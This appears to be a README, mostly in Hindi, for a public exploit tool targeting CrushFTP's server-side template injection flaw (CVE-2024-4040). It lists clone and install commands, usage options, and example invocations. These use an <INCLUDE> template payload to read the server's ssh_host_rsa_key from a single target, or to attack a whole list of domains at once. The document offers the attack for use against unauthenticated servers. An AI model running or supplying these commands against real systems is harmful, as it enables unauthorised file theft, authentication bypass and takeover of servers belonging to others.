
CrushFTP SSTI भेद्यता (CVE-2024-4040) के लिए शोषण जो प्रभावित सर्वरों पर अनधिकृत फ़ाइल रीड, प्रमाणीकरण बाईपास और दूरस्थ कोड निष्पादन सक्षम बनाता है।
CrushFTP के सभी संस्करणों में 10.7.1 और 11.1.0 से पहले के संस्करणों में एक सर्वर साइड टेम्पलेट इंजेक्शन कमजोरी मौजूद है, जो सभी प्लेटफार्मों पर अप्रमाणित रिमोट हमलावरों को VFS सैंडबॉक्स के बाहर फाइल सिस्टम से फाइलें पढ़ने, प्रमाणीकरण को बायपास करके प्रशासनिक पहुंच प्राप्त करने और सर्वर पर रिमोट कोड निष्पादन करने की अनुमति देती है।
git clone https://github.com/gotr00t0day/CVE-2024-4040.git
cd CVE-2024-4040
pip3 instrall -r requirements.txt
usage: CVE-2024-4040.py [-h] [-t TARGET] [-f FILE] [-d DOMAINS]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
target to scan
-f FILE, --file FILE file to fetch
-d DOMAINS, --domains DOMAINS
file containing list of domains
# MAKE SURE YOU USE THE <INCLUDE> TAG OR ANY OTHER TAG TO EXPLOIT THE TARGET, SOMETIMES YOU DONT NEED ANY TAGS.
# Exploit a target
python3 CVE-2024-4040.py -t http://TARGET:8080 -f "<INCLUDE>ssh_host_rsa_key</INCLUDE>"
# Exploit a list of targets
python3 CVE-2024-4040.py -d ~/list.txt -f %hostname%
कृपया इस एक्सप्लॉइट का उपयोग करने के बारे में बेहतर समझ के लिए ATTACKERKB ANALYSIS पढ़ें।